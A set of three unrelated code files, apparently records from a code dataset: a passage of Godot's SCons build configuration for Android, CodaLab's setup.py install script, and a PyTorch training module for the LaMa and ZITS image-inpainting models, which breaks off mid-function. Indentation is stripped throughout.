env.Tool('gcc')
return env.Clone(tools=tools)
def configure(env):
# Workaround for MinGW. See:
# http://www.scons.org/wiki/LongCmdLinesOnWin32
if (os.name == "nt"):
import subprocess
def mySubProcess(cmdline, env):
# print("SPAWNED : " + cmdline)
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, startupinfo=startupinfo, shell=False, env=env)
data, err = proc.communicate()
rv = proc.wait()
if rv:
print("=====")
print(err)
print("=====")
return rv
def mySpawn(sh, escape, cmd, args, env):
newargs = ' '.join(args[1:])
cmdline = cmd + " " + newargs
rv = 0
if len(cmdline) > 32000 and cmd.endswith("ar"):
cmdline = cmd + " " + args[1] + " " + args[2] + " "
for i in range(3, len(args)):
rv = mySubProcess(cmdline + args[i], env)
if rv:
break
else:
rv = mySubProcess(cmdline, env)
return rv
env['SPAWN'] = mySpawn
## Architecture
if env['android_arch'] not in ['armv7', 'armv6', 'arm64v8', 'x86', 'x86_64']:
env['android_arch'] = 'armv7'
neon_text = ""
if env["android_arch"] == "armv7" and env['android_neon']:
neon_text = " (with NEON)"
print("Building for Android (" + env['android_arch'] + ")" + neon_text)
can_vectorize = True
if env['android_arch'] == 'x86':
env['ARCH'] = 'arch-x86'
env.extra_suffix = ".x86" + env.extra_suffix
target_subpath = "x86-4.9"
abi_subpath = "i686-linux-android"
arch_subpath = "x86"
env["x86_libtheora_opt_gcc"] = True
if env['android_arch'] == 'x86_64':
if get_platform(env["ndk_platform"]) < 21:
print("WARNING: android_arch=x86_64 is not supported by ndk_platform lower than android-21; setting ndk_platform=android-21")
env["ndk_platform"] = "android-21"
env['ARCH'] = 'arch-x86_64'
env.extra_suffix = ".x86_64" + env.extra_suffix
target_subpath = "x86_64-4.9"
abi_subpath = "x86_64-linux-android"
arch_subpath = "x86_64"
env["x86_libtheora_opt_gcc"] = True
elif env['android_arch'] == 'armv6':
env['ARCH'] = 'arch-arm'
env.extra_suffix = ".armv6" + env.extra_suffix
target_subpath = "arm-linux-androideabi-4.9"
abi_subpath = "arm-linux-androideabi"
arch_subpath = "armeabi"
can_vectorize = False
elif env["android_arch"] == "armv7":
env['ARCH'] = 'arch-arm'
target_subpath = "arm-linux-androideabi-4.9"
abi_subpath = "arm-linux-androideabi"
arch_subpath = "armeabi-v7a"
if env['android_neon']:
env.extra_suffix = ".armv7.neon" + env.extra_suffix
else:
env.extra_suffix = ".armv7" + env.extra_suffix
elif env["android_arch"] == "arm64v8":
if get_platform(env["ndk_platform"]) < 21:
print("WARNING: android_arch=arm64v8 is not supported by ndk_platform lower than android-21; setting ndk_platform=android-21")
env["ndk_platform"] = "android-21"
env['ARCH'] = 'arch-arm64'
target_subpath = "aarch64-linux-android-4.9"
abi_subpath = "aarch64-linux-android"
arch_subpath = "arm64-v8a"
env.extra_suffix = ".armv8" + env.extra_suffix
## Build type
if (env["target"].startswith("release")):
if (env["optimize"] == "speed"): #optimize for speed (default)
env.Append(LINKFLAGS=['-O2'])
env.Append(CPPFLAGS=['-O2', '-DNDEBUG', '-fomit-frame-pointer'])
else: #optimize for size
env.Append(CPPFLAGS=['-Os', '-DNDEBUG'])
env.Append(LINKFLAGS=['-Os'])
if (can_vectorize):
env.Append(CPPFLAGS=['-ftree-vectorize'])
if (env["target"] == "release_debug"):
env.Append(CPPFLAGS=['-DDEBUG_ENABLED'])
elif (env["target"] == "debug"):
env.Append(LINKFLAGS=['-O0'])
env.Append(CPPFLAGS=['-O0', '-D_DEBUG', '-UNDEBUG', '-DDEBUG_ENABLED',
'-DDEBUG_MEMORY_ENABLED', '-g', '-fno-limit-debug-info'])
## Compiler configuration
env['SHLIBSUFFIX'] = '.so'
if env['PLATFORM'] == 'win32':
env.Tool('gcc')
env.use_windows_spawn_fix()
mt_link = True
if (sys.platform.startswith("linux")):
host_subpath = "linux-x86_64"
elif (sys.platform.startswith("darwin")):
host_subpath = "darwin-x86_64"
elif (sys.platform.startswith('win')):
if (platform.machine().endswith('64')):
host_subpath = "windows-x86_64"
else:
mt_link = False
host_subpath = "windows"
if env["android_arch"] == "arm64v8":
mt_link = False
compiler_path = env["ANDROID_NDK_ROOT"] + "/toolchains/llvm/prebuilt/" + host_subpath + "/bin"
gcc_toolchain_path = env["ANDROID_NDK_ROOT"] + "/toolchains/" + target_subpath + "/prebuilt/" + host_subpath
tools_path = gcc_toolchain_path + "/" + abi_subpath + "/bin"
# For Clang to find NDK tools in preference of those system-wide
env.PrependENVPath('PATH', tools_path)
ccache_path = os.environ.get("CCACHE")
if ccache_path is None:
env['CC'] = compiler_path + '/clang'
env['CXX'] = compiler_path + '/clang++'
else:
# there aren't any ccache wrappers available for Android,
# to enable caching we need to prepend the path to the ccache binary
env['CC'] = ccache_path + ' ' + compiler_path + '/clang'
env['CXX'] = ccache_path + ' ' + compiler_path + '/clang++'
env['AR'] = tools_path + "/ar"
env['RANLIB'] = tools_path + "/ranlib"
env['AS'] = tools_path + "/as"
common_opts = ['-fno-integrated-as', '-gcc-toolchain', gcc_toolchain_path]
lib_sysroot = env["ANDROID_NDK_ROOT"] + "/platforms/" + env['ndk_platform'] + "/" + env['ARCH']
## Compile flags
env.Append(CPPFLAGS=["-isystem", env["ANDROID_NDK_ROOT"] + "/sources/cxx-stl/llvm-libc++/include"])
env.Append(CPPFLAGS=["-isystem", env["ANDROID_NDK_ROOT"] + "/sources/cxx-stl/llvm-libc++abi/include"])
env.Append(CXXFLAGS=["-std=gnu++14"])
# Disable exceptions and rtti on non-tools (template) builds
if env['tools']:
env.Append(CXXFLAGS=['-frtti'])
else:
env.Append(CXXFLAGS=['-fno-rtti', '-fno-exceptions'])
# Don't use dynamic_cast, necessary with no-rtti.
env.Append(CPPFLAGS=['-DNO_SAFE_CAST'])
ndk_version = get_ndk_version(env["ANDROID_NDK_ROOT"])
if ndk_version != None and LooseVersion(ndk_version) >= LooseVersion("15.0.4075724"):
print("Using NDK unified headers")
sysroot = env["ANDROID_NDK_ROOT"] + "/sysroot"
env.Append(CPPFLAGS=["--sysroot="+sysroot])
env.Append(CPPFLAGS=["-isystem", sysroot + "/usr/include/" + abi_subpath])
env.Append(CPPFLAGS=["-isystem", env["ANDROID_NDK_ROOT"] + "/sources/android/support/include"])
# For unified headers this define has to be set manually
env.Append(CPPFLAGS=["-D__ANDROID_API__=" + str(get_platform(env['ndk_platform']))])
else:
print("Using NDK deprecated headers")
env.Append(CPPFLAGS=["-isystem", lib_sysroot + "/usr/include"])
env.Append(CPPFLAGS='-fpic -ffunction-sections -funwind-tables -fstack-protector-strong -fvisibility=hidden -fno-strict-aliasing'.split())
env.Append(CPPFLAGS='-DNO_STATVFS -DGLES_ENABLED'.split())
env['neon_enabled'] = False
if env['android_arch'] == 'x86':
target_opts = ['-target', 'i686-none-linux-android']
# The NDK adds this if targeting API < 21, so we can drop it when Godot targets it at least
env.Append(CPPFLAGS=['-mstackrealign'])
elif env['android_arch'] == 'x86_64':
target_opts = ['-target', 'x86_64-none-linux-android']
elif env["android_arch"] == "armv6":
target_opts = ['-target', 'armv6-none-linux-androideabi']
env.Append(CPPFLAGS='-D__ARM_ARCH_6__ -march=armv6 -mfpu=vfp -mfloat-abi=softfp'.split())
elif env["android_arch"] == "armv7":
target_opts = ['-target', 'armv7-none-linux-androideabi']
env.Append(CPPFLAGS='-D__ARM_ARCH_7__ -D__ARM_ARCH_7A__ -march=armv7-a -mfloat-abi=softfp'.split())
if env['android_neon']:
env['neon_enabled'] = True
env.Append(CPPFLAGS=['-mfpu=neon', '-D__ARM_NEON__'])
else:
env.Append(CPPFLAGS=['-mfpu=vfpv3-d16'])
elif env["android_arch"] == "arm64v8":
target_opts = ['-target', 'aarch64-none-linux-android']
env.Append(CPPFLAGS=['-D__ARM_ARCH_8A__'])
env.Append(CPPFLAGS=['-mfix-cortex-a53-835769'])
env.Append(CPPFLAGS=target_opts)
env.Append(CPPFLAGS=common_opts)
## Link flags
if ndk_version != None and LooseVersion(ndk_version) >= LooseVersion("15.0.4075724"):
if LooseVersion(ndk_version) >= LooseVersion("17.1.4828580"):
env.Append(LINKFLAGS=['-Wl,--exclude-libs,libgcc.a','-Wl,--exclude-libs,libatomic.a','-nostdlib++'])
else:
env.Append(LINKFLAGS=[env["ANDROID_NDK_ROOT"] +"/sources/cxx-stl/llvm-libc++/libs/"+arch_subpath+"/libandroid_support.a"])
env.Append(LINKFLAGS=['-shared', '--sysroot=' + lib_sysroot, '-Wl,--warn-shared-textrel'])
env.Append(LIBPATH=[env["ANDROID_NDK_ROOT"] + "/sources/cxx-stl/llvm-libc++/libs/"+arch_subpath+"/"])
env.Append(LINKFLAGS=[env["ANDROID_NDK_ROOT"] +"/sources/cxx-stl/llvm-libc++/libs/"+arch_subpath+"/libc++_shared.so"])
else:
env.Append(LINKFLAGS=['-shared', '--sysroot=' + lib_sysroot, '-Wl,--warn-shared-textrel'])
if mt_link:
env.Append(LINKFLAGS=['-Wl,--threads'])
if env["android_arch"] == "armv7":
env.Append(LINKFLAGS='-Wl,--fix-cortex-a8'.split())
env.Append(LINKFLAGS='-Wl,--no-undefined -Wl,-z,noexecstack -Wl,-z,relro -Wl,-z,now'.split())
env.Append(LINKFLAGS='-Wl,-soname,libgodot_android.so -Wl,--gc-sections'.split())
env.Append(LINKFLAGS=target_opts)
env.Append(LINKFLAGS=common_opts)
env.Append(LIBPATH=[env["ANDROID_NDK_ROOT"] + '/toolchains/' + target_subpath + '/prebuilt/' +
host_subpath + '/lib/gcc/' + abi_subpath + '/4.9.x'])
env.Append(LIBPATH=[env["ANDROID_NDK_ROOT"] +
'/toolchains/' + target_subpath + '/prebuilt/' + host_subpath + '/' + abi_subpath + '/lib'])
env.Append(CPPPATH=['#platform/android'])
env.Append(CPPFLAGS=['-DANDROID_ENABLED', '-DUNIX_ENABLED', '-DNO_FCNTL'])
env.Append(LIBS=['OpenSLES', 'EGL', 'GLESv3', 'android', 'log', 'z', 'dl'])
# Return NDK version string in source.properties (adapted from the Chromium project).
def get_ndk_version(path):
if path is None:
return None
prop_file_path = os.path.join(path, "source.properties")
try:
with open(prop_file_path) as prop_file:
for line in prop_file:
key_value = list(map(lambda x: x.strip(), line.split("=")))
if key_value[0] == "Pkg.Revision":
return key_value[1]
except:
print("Could not read source prop file '%s'" % prop_file_path)
return None
|
65152
|
from setuptools import setup, find_packages
from setuptools.command.install import install
import os
import setuptools
import sys
# should match codalab/common.py#CODALAB_VERSION
CODALAB_VERSION = "1.1.4"
class Install(install):
_WARNING_TEMPLATE = (
'\n\n\033[1m\033[93mWarning! CodaLab was installed at {}, which is not\n'
'one of the following paths in $PATH:\n\n{}\n\nConsider adding {} to $PATH\n'
'to use the CodaLab CLI. You can do this by {}\033[0m\n\n'
)
_UNIX_FIX = 'appending the following line to your .bashrc:\nexport PATH="$PATH:{}"'
_WINDOWS_FIX = (
'by selecting System from the Control Panel, selecting Advanced system\n'
'settings, clicking Environment Variables and adding {} to the list.'
)
_WINDOWS_PLATFORM_VALUES = {'win32', 'cygwin'}
@staticmethod
def _build_fix_message(installed_path):
return (
Install._WINDOWS_FIX.format(installed_path)
if sys.platform in Install._WINDOWS_PLATFORM_VALUES
else Install._UNIX_FIX.format(installed_path)
)
def run(self):
install.run(self)
self._check_path()
def _check_path(self):
cl_path = self.install_scripts
executable_paths = os.environ['PATH'].split(os.pathsep)
if cl_path not in executable_paths:
# Prints a yellow, bold warning message in regards to the installation path not in $PATH
print(
Install._WARNING_TEMPLATE.format(
cl_path,
'\n'.join(executable_paths),
cl_path,
Install._build_fix_message(cl_path),
)
)
def get_requirements(*requirements_file_paths):
requirements = []
for requirements_file_path in requirements_file_paths:
with open(requirements_file_path) as requirements_file:
for line in requirements_file:
if line[0:2] != '-r':
requirements.append(line.strip())
return requirements
if int(setuptools.__version__.split('.')[0]) < 25:
print(
"WARNING: Please upgrade setuptools to a newer version, otherwise installation may break. "
"Recommended command: `pip3 install -U setuptools`"
)
setup(
name='codalab',
version=CODALAB_VERSION,
description='CLI for CodaLab, a platform for reproducible computation',
long_description=(
'Visit https://worksheets.codalab.org/ or setup your own server by following the '
'instructions in the documentation (https://codalab-worksheets.readthedocs.io/en/latest/Server-Setup).'
),
url='https://github.com/codalab/codalab-worksheets',
author='CodaLab',
author_email='<EMAIL>',
license='Apache License 2.0',
keywords='codalab reproducible computation worksheets competitions',
packages=find_packages(exclude=["tests*"]),
classifiers=[
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"License :: OSI Approved :: Apache Software License",
],
py_modules=['codalab_service'],
python_requires='~=3.6',
cmdclass={'install': Install},
include_package_data=True,
install_requires=get_requirements('requirements.txt'),
entry_points={
'console_scripts': [
'cl=codalab.bin.cl:main',
'cl-server=codalab.bin.server:main',
'cl-bundle-manager=codalab.bin.bundle_manager:main',
'codalab-service=codalab_service:main',
'cl-worker=codalab.worker.main:main',
'cl-worker-manager=codalab.worker_manager.main:main',
'cl-competitiond=scripts.competitiond:main',
]
},
zip_safe=False,
)
|
65171
|
import time
import torch
from torch.utils.data import DataLoader, RandomSampler
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm
from datasets.dataset_FTR import *
from src.models.FTR_model import *
from .inpainting_metrics import get_inpainting_metrics
from .utils import Progbar, create_dir, stitch_images, SampleEdgeLineLogits
class LaMa:
def __init__(self, config, gpu, rank, test=False):
self.config = config
self.device = gpu
self.global_rank = rank
self.model_name = 'inpaint'
kwargs = dict(config.training_model)
kwargs.pop('kind')
self.inpaint_model = LaMaInpaintingTrainingModule(config, gpu=gpu, rank=rank, test=test, **kwargs).to(gpu)
self.train_dataset = ImgDataset(config.TRAIN_FLIST, config.INPUT_SIZE, config.MASK_RATE, config.TRAIN_MASK_FLIST,
augment=True, training=True, test_mask_path=None)
if config.DDP:
self.train_sampler = DistributedSampler(self.train_dataset, num_replicas=config.world_size,
rank=self.global_rank, shuffle=True)
# else:
# self.train_sampler = DistributedSampler(self.train_dataset, num_replicas=1, rank=0, shuffle=True)
self.val_dataset = ImgDataset(config.VAL_FLIST, config.INPUT_SIZE, mask_rates=None, mask_path=None, augment=False,
training=False, test_mask_path=config.TEST_MASK_FLIST)
self.sample_iterator = self.val_dataset.create_iterator(config.SAMPLE_SIZE)
self.samples_path = os.path.join(config.PATH, 'samples')
self.results_path = os.path.join(config.PATH, 'results')
self.val_path = os.path.join(config.PATH, 'validation')
create_dir(self.val_path)
self.log_file = os.path.join(config.PATH, 'log_' + self.model_name + '.dat')
self.best = float("inf") if self.inpaint_model.best is None else self.inpaint_model.best
def save(self):
if self.global_rank == 0:
self.inpaint_model.save()
def train(self):
if self.config.DDP:
train_loader = DataLoader(self.train_dataset, shuffle=False, pin_memory=True,
batch_size=self.config.BATCH_SIZE // self.config.world_size,
num_workers=12, sampler=self.train_sampler)
else:
train_loader = DataLoader(self.train_dataset, pin_memory=True,
batch_size=self.config.BATCH_SIZE, num_workers=12, shuffle=True)
epoch = 0
keep_training = True
max_iteration = int(float((self.config.MAX_ITERS)))
total = len(self.train_dataset) // self.config.world_size
if total == 0 and self.global_rank == 0:
print('No training data was provided! Check \'TRAIN_FLIST\' value in the configuration file.')
return
while keep_training:
epoch += 1
if self.config.DDP:
self.train_sampler.set_epoch(epoch + 1) # Shuffle each epoch
epoch_start = time.time()
if self.global_rank == 0:
print('\n\nTraining epoch: %d' % epoch)
progbar = Progbar(total, width=20, stateful_metrics=['epoch', 'iter', 'loss_scale'],
verbose=1 if self.global_rank == 0 else 0)
for _, items in enumerate(train_loader):
self.inpaint_model.train()
items['image'] = items['image'].to(self.device)
items['mask'] = items['mask'].to(self.device)
# train
outputs, gen_loss, dis_loss, logs, batch = self.inpaint_model.process(items)
iteration = self.inpaint_model.iteration
if iteration >= max_iteration:
keep_training = False
break
logs = [
("epoch", epoch),
("iter", iteration),
] + [(i, logs[0][i]) for i in logs[0]] + [(i, logs[1][i]) for i in logs[1]]
if self.config.No_Bar:
pass
else:
progbar.add(len(items['image']),
values=logs if self.config.VERBOSE else [x for x in logs if not x[0].startswith('l_')])
# log model at checkpoints
if self.config.LOG_INTERVAL and iteration % self.config.LOG_INTERVAL == 1 and self.global_rank == 0:
self.log(logs)
# sample model at checkpoints
if self.config.SAMPLE_INTERVAL and iteration % self.config.SAMPLE_INTERVAL == 1 and self.global_rank == 0:
self.sample()
# evaluate model at checkpoints
if self.config.EVAL_INTERVAL and iteration % self.config.EVAL_INTERVAL == 1:
if self.global_rank == 0:
print('\nstart eval...\n')
print("Epoch: %d" % epoch)
psnr, ssim, fid = self.eval()
if self.best > fid and self.global_rank == 0:
self.best = fid
print("current best epoch is %d" % epoch)
print('\nsaving %s...\n' % self.inpaint_model.name)
raw_model = self.inpaint_model.generator.module if \
hasattr(self.inpaint_model.generator, "module") else self.inpaint_model.generator
torch.save({
'iteration': self.inpaint_model.iteration,
'generator': raw_model.state_dict(),
'best_fid': fid,
'ssim': ssim,
'psnr': psnr
}, os.path.join(self.config.PATH, self.inpaint_model.name + '_best_gen.pth'))
raw_model = self.inpaint_model.discriminator.module if \
hasattr(self.inpaint_model.discriminator, "module") else self.inpaint_model.discriminator
torch.save({
'discriminator': raw_model.state_dict(),
'best_fid': fid,
'ssim': ssim,
'psnr': psnr
}, os.path.join(self.config.PATH, self.inpaint_model.name + '_best_dis.pth'))
# save model at checkpoints
if self.config.SAVE_INTERVAL and iteration % self.config.SAVE_INTERVAL == 1 and self.global_rank == 0:
self.save()
if self.global_rank == 0:
print("Epoch: %d, time for one epoch: %d seconds" % (epoch, time.time() - epoch_start))
logs = [('Epoch', epoch), ('time', time.time() - epoch_start)]
self.log(logs)
print('\nEnd training....')
def eval(self):
if self.config.DDP:
val_loader = DataLoader(self.val_dataset, shuffle=False, pin_memory=True,
batch_size=self.config.BATCH_SIZE // self.config.world_size, ## BS of each GPU
num_workers=12)
else:
val_loader = DataLoader(self.val_dataset, shuffle=False, pin_memory=True,
batch_size=self.config.BATCH_SIZE, num_workers=12)
total = len(self.val_dataset)
self.inpaint_model.eval()
if self.config.No_Bar:
pass
else:
progbar = Progbar(total, width=20, stateful_metrics=['it'])
iteration = 0
with torch.no_grad():
for items in tqdm(val_loader):
iteration += 1
items['image'] = items['image'].to(self.device)
items['mask'] = items['mask'].to(self.device)
b, _, _, _ = items['image'].size()
# inpaint model
# eval
items = self.inpaint_model(items)
outputs_merged = (items['predicted_image'] * items['mask']) + (items['image'] * (1 - items['mask']))
# save
outputs_merged *= 255.0
outputs_merged = outputs_merged.permute(0, 2, 3, 1).int().cpu().numpy()
for img_num in range(b):
cv2.imwrite(self.val_path + '/' + items['name'][img_num], outputs_merged[img_num, :, :, ::-1])
our_metric = get_inpainting_metrics(self.val_path, self.config.GT_Val_FOLDER, None, fid_test=True)
if self.global_rank == 0:
print("iter: %d, PSNR: %f, SSIM: %f, FID: %f, LPIPS: %f" %
(self.inpaint_model.iteration, float(our_metric['psnr']), float(our_metric['ssim']),
float(our_metric['fid']), float(our_metric['lpips'])))
logs = [('iter', self.inpaint_model.iteration), ('PSNR', float(our_metric['psnr'])),
('SSIM', float(our_metric['ssim'])), ('FID', float(our_metric['fid'])), ('LPIPS', float(our_metric['lpips']))]
self.log(logs)
return float(our_metric['psnr']), float(our_metric['ssim']), float(our_metric['fid'])
def sample(self, it=None):
# do not sample when validation set is empty
if len(self.val_dataset) == 0:
return
self.inpaint_model.eval()
with torch.no_grad():
items = next(self.sample_iterator)
items['image'] = items['image'].to(self.device)
items['mask'] = items['mask'].to(self.device)
# inpaint model
iteration = self.inpaint_model.iteration
inputs = (items['image'] * (1 - items['mask']))
items = self.inpaint_model(items)
outputs_merged = (items['predicted_image'] * items['mask']) + (items['image'] * (1 - items['mask']))
if it is not None:
iteration = it
image_per_row = 2
if self.config.SAMPLE_SIZE <= 6:
image_per_row = 1
images = stitch_images(
self.postprocess(items['image'].cpu()),
self.postprocess(inputs.cpu()),
self.postprocess(items['mask'].cpu()),
self.postprocess(items['predicted_image'].cpu()),
self.postprocess(outputs_merged.cpu()),
img_per_row=image_per_row
)
path = os.path.join(self.samples_path, self.model_name)
name = os.path.join(path, str(iteration).zfill(5) + ".png")
create_dir(path)
print('\nsaving sample ' + name)
images.save(name)
def log(self, logs):
with open(self.log_file, 'a') as f:
f.write('%s\n' % ' '.join([str(item[0]) + '\t' + str(item[1]) for item in logs]))
def cuda(self, *args):
return (item.to(self.config.DEVICE) for item in args)
def postprocess(self, img):
# [0, 1] => [0, 255]
img = img * 255.0
img = img.permute(0, 2, 3, 1)
return img.int()
class ZITS:
def __init__(self, config, gpu, rank, test=False):
self.config = config
self.device = gpu
self.global_rank = rank
self.model_name = 'inpaint'
kwargs = dict(config.training_model)
kwargs.pop('kind')
self.inpaint_model = DefaultInpaintingTrainingModule(config, gpu=gpu, rank=rank, test=test, **kwargs).to(gpu)
if config.min_sigma is None:
min_sigma = 2.0
else:
min_sigma = config.min_sigma
if config.max_sigma is None:
max_sigma = 2.5
else:
max_sigma = config.max_sigma
if config.round is None:
round = 1
else:
round = config.round
if not test:
self.train_dataset = DynamicDataset(config.TRAIN_FLIST, mask_path=config.TRAIN_MASK_FLIST,
batch_size=config.BATCH_SIZE // config.world_size,
pos_num=config.rel_pos_num, augment=True, training=True,
test_mask_path=None, train_line_path=config.train_line_path,
add_pos=config.use_MPE, world_size=config.world_size,
min_sigma=min_sigma, max_sigma=max_sigma, round=round)
if config.DDP:
self.train_sampler = DistributedSampler(self.train_dataset, num_replicas=config.world_size,
rank=self.global_rank, shuffle=True)
else:
self.train_sampler = DistributedSampler(self.train_dataset, num_replicas=1, rank=0, shuffle=True)
self.samples_path = os.path.join(config.PATH, 'samples')
self.results_path = os.path.join(config.PATH, 'results')
self.log_file = os.path.join(config.PATH, 'log_' + self.model_name + '.dat')
self.best = float("inf") if self.inpaint_model.best is None else self.inpaint_model.best
self.val_dataset = DynamicDataset(config.VAL_FLIST, mask_path=None, pos_num=config.rel_pos_num,
batch_size=config.BATCH_SIZE, augment=False, training=False,
test_mask_path=config.TEST_MASK_FLIST,
eval_line_path=config.eval_line_path,
add_pos=config.use_MPE, input_size=config.INPUT_SIZE,
min_sigma=min_sigma, max_sigma=max_sigma)
self.sample_iterator = self.val_dataset.create_iterator(config.SAMPLE_SIZE)
self.val_path = os.path.join(config.PATH, 'validation')
create_dir(self.val_path)
def save(self):
if self.global_rank == 0:
self.inpaint_model.save()
def train(self):
if self.config.DDP:
train_loader = DataLoader(self.train_dataset, shuffle=False, pin_memory=True,
batch_size=self.config.BATCH_SIZE // self.config.world_size,
num_workers=12, sampler=self.train_sampler)
else:
train_loader = DataLoader(self.train_dataset, pin_memory=True,
batch_size=self.config.BATCH_SIZE, num_workers=12,
sampler=self.train_sampler)
epoch = self.inpaint_model.iteration // len(train_loader)
keep_training = True
max_iteration = int(float((self.config.MAX_ITERS)))
total = len(self.train_dataset) // self.config.world_size
if total == 0 and self.global_rank == 0:
print('No training data was provided! Check \'TRAIN_FLIST\' value in the configuration file.')
return
while keep_training:
epoch += 1
if self.config.DDP or self.config.DP:
self.train_sampler.set_epoch(epoch + 1)
if self.config.fix_256 is None or self.config.fix_256 is False:
self.train_dataset.reset_dataset(self.train_sampler)
epoch_start = time.time()
if self.global_rank == 0:
print('\n\nTraining epoch: %d' % epoch)
progbar = Progbar(total, width=20, stateful_metrics=['epoch', 'iter', 'loss_scale',
'g_lr', 'd_lr', 'str_lr', 'img_size'],
verbose=1 if self.global_rank == 0 else 0)
for _, items in enumerate(train_loader):
iteration = self.inpaint_model.iteration
self.inpaint_model.train()
for k in items:
if type(items[k]) is torch.Tensor:
items[k] = items[k].to(self.device)
image_size = items['image'].shape[2]
random_add_v = random.random() * 1.5 + 1.5
random_mul_v = random.random() * 1.5 + 1.5 # [1.5~3]
# random mix the edge and line
if iteration > int(self.config.MIX_ITERS):
b, _, _, _ = items['edge'].shape
if int(self.config.MIX_ITERS) < iteration < int(self.config.Turning_Point):
pred_rate = (iteration - int(self.config.MIX_ITERS)) / \
(int(self.config.Turning_Point) - int(self.config.MIX_ITERS))
b = np.clip(int(pred_rate * b), 2, b)
iteration_num_for_pred = int(random.random() * 5) + 1
edge_pred, line_pred = SampleEdgeLineLogits(self.inpaint_model.transformer,
context=[items['img_256'][:b, ...],
items['edge_256'][:b, ...],
items['line_256'][:b, ...]],
mask=items['mask_256'][:b, ...].clone(),
iterations=iteration_num_for_pred,
add_v=0.05, mul_v=4)
edge_pred = edge_pred.detach().to(torch.float32)
line_pred = line_pred.detach().to(torch.float32)
if self.config.fix_256 is None or self.config.fix_256 is False:
if image_size < 300 and random.random() < 0.5:
edge_pred = F.interpolate(edge_pred, size=(image_size, image_size), mode='nearest')
line_pred = F.interpolate(line_pred, size=(image_size, image_size), mode='nearest')
else:
edge_pred = self.inpaint_model.structure_upsample(edge_pred)[0]
edge_pred = torch.sigmoid((edge_pred + random_add_v) * random_mul_v)
edge_pred = F.interpolate(edge_pred, size=(image_size, image_size), mode='bilinear',
align_corners=False)
line_pred = self.inpaint_model.structure_upsample(line_pred)[0]
line_pred = torch.sigmoid((line_pred + random_add_v) * random_mul_v)
line_pred = F.interpolate(line_pred, size=(image_size, image_size), mode='bilinear',
align_corners=False)
items['edge'][:b, ...] = edge_pred.detach()
items['line'][:b, ...] = line_pred.detach()
# train
outputs, gen_loss, dis_loss, logs, batch = self.inpaint_model.process(items)
if iteration >= max_iteration:
keep_training = False
break
logs = [("epoch", epoch), ("iter", iteration)] + \
[(i, logs[0][i]) for i in logs[0]] + [(i, logs[1][i]) for i in logs[1]]
logs.append(("g_lr", self.inpaint_model.g_scheduler.get_lr()[0]))
logs.append(("d_lr", self.inpaint_model.d_scheduler.get_lr()[0]))
logs.append(("str_lr", self.inpaint_model.str_scheduler.get_lr()[0]))
logs.append(("img_size", batch['size_ratio'][0].item() * 256))
progbar.add(len(items['image']),
values=logs if self.config.VERBOSE else [x for x in logs if not x[0].startswith('l_')])
# log model at checkpoints
if self.config.LOG_INTERVAL and iteration % self.config.LOG_INTERVAL == 0 and self.global_rank == 0:
self.log(logs)
# sample model at checkpoints
if self.config.SAMPLE_INTERVAL and iteration > 0 and iteration % self.config.SAMPLE_INTERVAL == 0 and self.global_rank == 0:
self.sample()
# evaluate model at checkpoints
if self.config.EVAL_INTERVAL and iteration > 0 and iteration % self.config.EVAL_INTERVAL == 0 and self.global_rank == 0:
print('\nstart eval...\n')
print("Epoch: %d" % epoch)
psnr, ssim, fid = self.eval()
if self.best > fid:
self.best = fid
print("current best epoch is %d" % epoch)
print('\nsaving %s...\n' % self.inpaint_model.name)
raw_model = self.inpaint_model.generator.module if \
hasattr(self.inpaint_model.generator, "module") else self.inpaint_model.generator
raw_encoder = self.inpaint_model.str_encoder.module if \
hasattr(self.inpaint_model.str_encoder, "module") else self.inpaint_model.str_encoder
torch.save({
'iteration': self.inpaint_model.iteration,
'generator': raw_model.state_dict(),
'str_encoder': raw_encoder.state_dict(),
'best_fid': fid,
'ssim': ssim,
'psnr': psnr
}, os.path.join(self.config.PATH,
self.inpaint_model.name + '_best_gen_HR.pth'))
raw_model = self.inpaint_model.discriminator.module if \
hasattr(self.inpaint_model.discriminator, "module") else self.inpaint_model.discriminator
torch.save({
'discriminator': raw_model.state_dict()
}, os.path.join(self.config.PATH, self.inpaint_model.name + '_best_dis_HR.pth'))
# save model at checkpoints
if self.config.SAVE_INTERVAL and iteration > 0 and iteration % self.config.SAVE_INTERVAL == 0 and self.global_rank == 0:
self.save()
if self.global_rank == 0:
print("Epoch: %d, time for one epoch: %d seconds" % (epoch, time.time() - epoch_start))
logs = [('Epoch', epoch), ('time', time.time() - epoch_start)]
self.log(logs)
print('\nEnd training....')
def eval(self):
val_loader = DataLoader(self.val_dataset, shuffle=False, pin_memory=True,
batch_size=self.config.BATCH_SIZE, num_workers=12)
self.inpaint_model.eval()
with torch.no_grad():
for items in tqdm(val_loader):
for k in items:
if type(items[k]) is torch.Tensor:
items[k] = items[k].to(self.device)
b, _, _, _ = items['edge'].shape
edge_pred, line_pred = SampleEdgeLineLogits(self.inpaint_model.transformer,
context=[items['img_256'][:b, ...],
items['edge_256'][:b, ...],
items['line_256'][:b, ...]],
mask=items['mask_256'][:b, ...].clone(),
iterations=5,
add_v=0.05, mul_v=4,
device=self.device)
edge_pred, line_pred = edge_pred[:b, ...].detach().to(torch.float32), \
line_pred[:b, ...].detach().to(torch.float32)
if self.config.fix_256 is None or self.config.fix_256 is False:
edge_pred = self.inpaint_model.structure_upsample(edge_pred)[0]
edge_pred = torch.sigmoid((edge_pred + 2) * 2)
line_pred = self.inpaint_model.structure_upsample(line_pred)[0]
line_pred = torch.sigmoid((line_pred + 2) * 2)
items['edge'][:b, ...] = edge_pred.detach()
items['line'][:b, ...] = line_pred.detach()
# eval
items = self.inpaint_model(items)
outputs_merged = (items['predicted_image'] * items['mask']) + (items['image'] * (1 - items['mask']))
# save
outputs_merged *= 255.0
outputs_merged = outputs_merged.permute(0, 2, 3, 1).int().cpu().numpy()
for img_num in range(b):
cv2.imwrite(self.val_path + '/' + items['name'][img_num], outputs_merged[img_num, :, :, ::-1])
our_metric = get_inpainting_metrics(self.val_path, self.config.GT_Val_FOLDER, None, fid_test=True)
if self.global_rank == 0:
print("iter: %d, PSNR: %f, SSIM: %f, FID: %f, LPIPS: %f" %
(self.inpaint_model.iteration, float(our_metric['psnr']), float(our_metric['ssim']),
float(our_metric['fid']), float(our_metric['lpips'])))
logs = [('iter', self.inpaint_model.iteration), ('PSNR', float(our_metric['psnr'])),
